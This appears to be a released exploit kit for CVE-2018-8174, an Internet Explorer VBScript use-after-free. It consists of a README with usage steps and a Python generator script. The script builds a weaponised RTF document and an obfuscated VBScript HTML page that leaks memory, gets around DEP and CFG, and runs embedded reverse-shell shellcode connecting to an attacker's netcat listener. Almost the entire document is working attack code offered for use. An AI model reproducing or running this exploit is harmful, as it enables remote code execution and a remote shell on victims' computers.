CVE-2018-8174 EXP 0day python

usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat

eg:

1. python CVE-2018-8174.py -u?http://1.1.1.1/exploit.html?-o exp.rtf -i 2.2.2.2 -p 4444
2. put exploit.html on your server (1.1.1.1)
3. netcat listen on [any] 4444 (2.2.2.2)

enjoy it !

POC:

  1 import argparse  2 import struct  3   4 SampleRTF = R"""{rtf1ansiansicpg1252deff0deflang1033{fonttbl{f0fnilfcharset0 Calibri;}}  5 {*generator Msftedit 5.41.21.2510;}viewkind4uc1pardsa200sl276slmult1lang9f0fs22{objectobjautlinkobjupdatersltpictobjw4321objh4321{*objclass htmlfile}{*objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000  6 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff  7 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff  8 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff  9 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 10 fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b 15 beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000 16 000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000 17 0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000 18 000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 19 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 20 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 21 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 22 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000 23 UNICODE_URL 24 000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000 25 000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700 26 NORMAL_URL 27 0000bbbbcccc2700 28 UNICODE_URL 29 0000000000000000000000000000000000000000000000000000 30 0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000 31 0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000} 32 }par 33 } 34 """ 35  36 SampleHTML = R""" 37 <!doctype html> 38 <html lang="en"> 39 <head> 40 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 41 <meta http-equiv="x-ua-compatible" content="IE=10"> 42 <meta http-equiv="Expires" content="0"> 43 <meta http-equiv="Pragma" content="no-cache"> 44 <meta http-equiv="Cache-control" content="no-cache"> 45 <meta http-equiv="Cache" content="no-cache"> 46 </head> 47 <body> 48 <script language="vbscript"> 49 Dim lIIl 50 Dim IIIlI(6),IllII(6) 51 Dim IllI 52 Dim IIllI(40) 53 Dim lIlIIl,lIIIll 54 Dim IlII 55 Dim llll,IIIIl 56 Dim llllIl,IlIIII 57 Dim NtContinueAddr,VirtualProtectAddr 58 IlII=195948557 59 lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000") 60 lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000") 61 IllI=195890093 62 Function IIIII(Domain)  63     lIlII=0 64     IllllI=0 65     IIlIIl=0 66     Id=CLng(Rnd*1000000) 67     lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99) 68     If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then 69         lIlII=lIlII-(&h86d+6447-&H219b) 70     End If 71     IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255) 72     IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e) 73     IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII 74 End Function 75 Function lIIII(ByVal lIlIl) 76     IIll="" 77     For index=0 To Len(lIlIl)-1 78         IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2) 79     Next 80     IIll=IIll &"00" 81     If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then 82         IIll=IIll &"00" 83     End If 84     For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4) 85         lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3)) 86         lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504)) 87         lIIII=lIIII &"%u" &lIlIll &lIIIlI 88     Next 89 End Function 90 Function lIlI(ByVal Number,ByVal Length) 91     IIII=Hex(Number) 92     If Len(IIII)<Length Then 93         IIII=String(Length-Len(IIII),"0") &IIII    'pad allign with zeros  94     Else 95         IIII=Right(IIII,Length) 96     End If 97     lIlI=IIII 98 End Function 99 Function GetUint32(lIII)100     Dim value101     llll.mem(IlII+8)=lIII+4102     llll.mem(IlII)=8        'type string103     value=llll.P0123456789104     llll.mem(IlII)=2105     GetUint32=value106 End Function107 Function IllIIl(lIII)108     IllIIl=GetUint32(lIII) And (131071-65536)109 End Function110 Function lllII(lIII)111     lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)112 End Function113 Sub llllll114 End Sub115 Function GetMemValue116     llll.mem(IlII)=(&h713+3616-&H1530)117     GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))118 End Function119 Sub SetMemValue(ByRef IlIIIl)120     llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl121 End Sub122 Function LeakVBAddr123     On Error Resume Next124     Dim lllll125     lllll=llllll126     lllll=null127     SetMemValue lllll128     LeakVBAddr=GetMemValue()129 End Function130 Function GetBaseByDOSmodeSearch(IllIll)131     Dim llIl132     llIl=IllIll And &hffff0000133     Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692134         llIl=llIl-65536135     Loop136     GetBaseByDOSmodeSearch=llIl137 End Function138 Function StrCompWrapper(lIII,llIlIl)139     Dim lIIlI,IIIl140     lIIlI=""141     For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)142         lIIlI=lIIlI &Chr(lllII(lIII+IIIl))143     Next144     StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))145 End Function146 Function GetBaseFromImport(base_address,name_input)147     Dim import_rva,nt_header,descriptor,import_dir148     Dim IIIIII149     nt_header=GetUint32(base_address+(&h3c))150     import_rva=GetUint32(base_address+nt_header+&h80)151     import_dir=base_address+import_rva152     descriptor=0153     Do While True154         Dim Name155         Name=GetUint32(import_dir+descriptor*(&h14)+&hc)156         If Name=0 Then157             GetBaseFromImport=&hBAAD0000158             Exit Function159         Else160             If StrCompWrapper(base_address+Name,name_input)=0 Then161                 Exit Do162             End If163         End If164         descriptor=descriptor+1165     Loop166     IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)167     GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))168 End Function169 Function GetProcAddr(dll_base,name)170     Dim p,export_dir,index171     Dim function_rvas,function_names,function_ordin172     Dim Illlll173     p=GetUint32(dll_base+&h3c)174     p=GetUint32(dll_base+p+&h78)175     export_dir=dll_base+p176     function_rvas=dll_base+GetUint32(export_dir+&h1c)177     function_names=dll_base+GetUint32(export_dir+&h20)178     function_ordin=dll_base+GetUint32(export_dir+&h24)179     index=0180     Do While True181         Dim lllI182         lllI=GetUint32(function_names+index*4)183         If StrCompWrapper(dll_base+lllI,name)=0 Then184             Exit Do185         End If186         index=index+1187     Loop188     Illlll=IllIIl(function_ordin+index*2)189     p=GetUint32(function_rvas+Illlll*4)190     GetProcAddr=dll_base+p191 End Function192 Function GetShellcode()193     IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))194     IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))195     GetShellcode=IIlI196 End Function197 Function EscapeAddress(ByVal value)198     Dim High,Low199     High=lIlI((value And &hffff0000)/&h10000,4)200     Low=lIlI(value And &hffff,4)201     EscapeAddress=Unescape("%u" &Low &"%u" &High)202 End Function203 Function lIllIl204     Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI205     IlllI=lIlI(NtContinueAddr,8)206     IlIII=Mid(IlllI,1,2)207     llllI=Mid(IlllI,3,2)208     llIII=Mid(IlllI,5,2)209     lIllI=Mid(IlllI,7,2)210     IIlI=""211     IIlI=IIlI &"%u0000%u" &lIllI &"00"212     For IIIl=1 To 3213         IIlI=IIlI &"%u" &llllI &llIII214         IIlI=IIlI &"%u" &lIllI &IlIII215     Next216     IIlI=IIlI &"%u" &llllI &llIII217     IIlI=IIlI &"%u00" &IlIII218     lIllIl=Unescape(IIlI)219 End Function220 Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg221     Dim IIlI222     IIlI=String((100334-65536),Unescape("%u4141"))223     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)224     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)225     IIlI=IIlI &EscapeAddress(&h3000)226     IIlI=IIlI &EscapeAddress(&h40)227     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)228     IIlI=IIlI &String(6,Unescape("%u4242"))229     IIlI=IIlI &lIllIl()230     IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))231     WrapShellcodeWithNtContinueContext=IIlI232 End Function233 Function ExpandWithVirtualProtect(lIlll)234     Dim IIlI235     Dim lllllI236     lllllI=lIlll+&h23237     IIlI=""238     IIlI=IIlI &EscapeAddress(lllllI)239     IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))240     IIlI=IIlI &EscapeAddress(VirtualProtectAddr)241     IIlI=IIlI &EscapeAddress(&h1b)242     IIlI=IIlI &EscapeAddress(0)243     IIlI=IIlI &EscapeAddress(lIlll)244     IIlI=IIlI &EscapeAddress(&h23)245     IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))246     ExpandWithVirtualProtect=IIlI247 End Function248 Sub ExecuteShellcode249     llll.mem(IlII)=&h4d 'DEP bypass250     llll.mem(IlII+8)=0251     msgbox(IlII)        'VT replaced252 End Sub253 Class cla1254 Private Sub Class_Terminate()255     Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))256     IllI=IllI+(&h14b5+2725-&H1f59)257     lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)258 End Sub259 End Class260 Class cla2261 Private Sub Class_Terminate()262     Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))263     IllI=IllI+(&h880+542-&Ha9d)264     lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)265 End Sub266 End Class267 Class IIIlIl268 End Class269 Class llIIl270 Dim mem271 Function P272 End Function273 Function SetProp(Value)274     mem=Value275     SetProp=0276 End Function277 End Class278 Class IIIlll279 Dim mem280 Function P0123456789281     P0123456789=LenB(mem(IlII+8))282 End Function283 Function SPP284 End Function285 End Class286 Class lllIIl287 Public Default Property Get P288 Dim llII289 P=174088534690791e-324290 For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)291     IIIlI(IIIl)=(&h2176+711-&H243d)292 Next293 Set llII=New IIIlll294 llII.mem=lIlIIl295 For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)296     Set IIIlI(IIIl)=llII297 Next298 End Property299 End Class300 Class llllII301 Public Default Property Get P302 Dim llII303 P=636598737289582e-328304 For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)305     IllII(IIIl)=(&h442+2598-&He68)306 Next307 Set llII=New IIIlll308 llII.mem=lIIIll309 For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)310     Set IllII(IIIl)=llII311 Next312 End Property313 End Class314 Set llllIl=New lllIIl315 Set IlIIII=New llllII316 Sub UAF317     For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)318         Set IIllI(IIIl)=New IIIlIl319     Next320     For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)321         Set IIllI(IIIl)=New llIIl322     Next323     IllI=0324     For IIIl=0 To 6325         ReDim lIIl(1)326         Set lIIl(1)=New cla1327         Erase lIIl328     Next329     Set llll=New llIIl330     IllI=0331     For IIIl=0 To 6332         ReDim lIIl(1)333         Set lIIl(1)=New cla2334         Erase lIIl335     Next336     Set IIIIl=New llIIl337 End Sub338 Sub InitObjects339     llll.SetProp(llllIl)340     IIIIl.SetProp(IlIIII)341     IlII=IIIIl.mem342 End Sub343 Sub StartExploit344     UAF345     InitObjects346     vb_adrr=LeakVBAddr()347     // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))348     vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))349     // Alert "VBScript Base: 0x" & Hex(vbs_base) 350     msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")351     // Alert "MSVCRT Base: 0x" & Hex(msv_base) 352     krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")353     // Alert "KernelBase Base: 0x" & Hex(krb_base) 354     ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")355     // Alert "Ntdll Base: 0x" & Hex(ntd_base) 356     VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")357     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 358     NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")359     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 360     SetMemValue GetShellcode()361     ShellcodeAddr=GetMemValue()+8362     // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr) 363     SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)364     lIlll=GetMemValue()+69596365     SetMemValue ExpandWithVirtualProtect(lIlll)366     llIIll=GetMemValue()367     // Alert "Executing Shellcode"368     ExecuteShellcode369 End Sub370 StartExploit371 </script>372 </body>373 </html>374 """375 376 reverseip = '1.1.1.1'377 reverseport = 4444378 379 def create_rtf_file(url,filename):380     NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))381     UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)382     if len(UNICODE_URL) < 154:383         print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)384         UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))385     res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)386     f = open(filename, 'w')387     f.write(res)388     f.close()389     print "Generated "+filename+" successfully"390 391 392 def rev_shellcode(ip,port):393     ip = [int(i) for i in ip.split(".")]394     buf =  ""395     buf += "xfcxe9x8ax00x00x00x5dx83xc5x0bx81xc4x70"396     buf += "xfexffxffx8dx54x24x60x52x68xb1x4ax6bxb1"397     buf += "xffxd5x8dx44x24x60xebx5cx5ex8dx78x60x57"398     buf += "x50x31xdbx53x53x68x04x00x00x08x53x53x53"399     buf += "x56x53x68x79xccx3fx86xffxd5x85xc0x74x59"400     buf += "x6ax40x80xc7x10x53x53x31xdbx53xffx37x68"401     buf += "xaex87x92x3fxffxd5x54x68x44x01x00x00xeb"402     buf += "x39x50xffx37x68xc5xd8xbdxe7xffxd5x53x53"403     buf += "x53x8bx4cx24xfcx51x53x53xffx37x68xc6xac"404     buf += "x9ax79xffxd5xe9x41x01x00x00xe8x9fxffxff"405     buf += "xffx72x75x6ex64x6cx6cx33x32x2ex65x78x65"406     buf += "x00xe8x71xffxffxffxe8xc2xffxffxffxfcxe8"407     buf += "x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"408     buf += "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"409     buf += "x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01"410     buf += "xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4c"411     buf += "x11x78xe3x48x01xd1x51x8bx59x20x01xd3x8b"412     buf += "x49x18xe3x3ax49x8bx34x8bx01xd6x31xffxac"413     buf += "xc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3b"414     buf += "x7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0c"415     buf += "x4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44"416     buf += "x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5a"417     buf += "x8bx12xebx8dx5dx68x33x32x00x00x68x77x73"418     buf += "x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01"419     buf += "x00x00x29xc4x54x50x68x29x80x6bx00xffxd5"420     buf += "x50x50x50x50x40x50x40x50x68xeax0fxdfxe0"421     buf += "xffxd5x97x6ax05x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"x68x02x00"422     buf += struct.pack("!H",port)+"x89xe6x6ax10x56x57x68x99xa5x74x61"423     buf += "xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0"424     buf += "xb5xa2x56xffxd5x68x63x6dx64x00x89xe3x57"425     buf += "x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44"426     buf += "x24x3cx01x01x8dx44x24x10xc6x00x44x54x50"427     buf += "x56x56x56x46x56x4ex56x56x53x56x68x79xcc"428     buf += "x3fx86xffxd5x89xe0x4ex56x46xffx30x68x08"429     buf += "x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95"430     buf += "xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05"431     buf += "xbbx47x13x72x6fx6ax00x53xffxd5"432 433     return buf.encode("hex")434 435 def gen_shellcode(s):436     n = len(s)437     i = 0438     strs = ''439     if n % 4 == 2:440         s=s+'41'441     while i <n:442         strs += '%u'+s[i+2:i+4]+s[i:i+2]443         i+=4444     return strs445 446 if __name__ == '__main__':447     parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")448     parser.add_argument("-u", "--url", help="exp url", required=True)449     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)450     parser.add_argument('-i', "--ip", help="ip for netcat", required=False)451     parser.add_argument('-p', "--port", help="port for netcat", required=False)452     args = parser.parse_args()453     url = args.url454     filename = args.output455     create_rtf_file(url,filename)456     if args.ip and args.port:457         ip = str(args.ip)458         port = int(args.port)459         shellcode = gen_shellcode(rev_shellcode(ip,port))460     else:461         shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))462     res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)463     f = open('exploit.html', 'w')464     f.write(res)465     f.close()466 467     print "!!! Completed !!!"